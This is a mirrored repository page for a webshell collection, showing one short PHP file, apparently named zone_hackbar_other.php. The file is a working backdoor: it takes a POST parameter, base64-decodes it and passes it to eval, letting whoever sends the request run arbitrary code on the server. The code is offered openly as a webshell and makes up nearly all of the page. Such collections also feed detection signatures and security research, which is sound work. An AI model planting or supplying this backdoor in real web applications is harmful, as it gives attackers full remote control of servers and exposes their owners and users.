1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/zone_hackbar_other.php
2016-05-14 10:00:16 +08:00

7 lines
81 B
PHP

<?php
$a = $_POST['n985de9'];
if(isset($a)) {
eval(base64_decode($a));
}
?>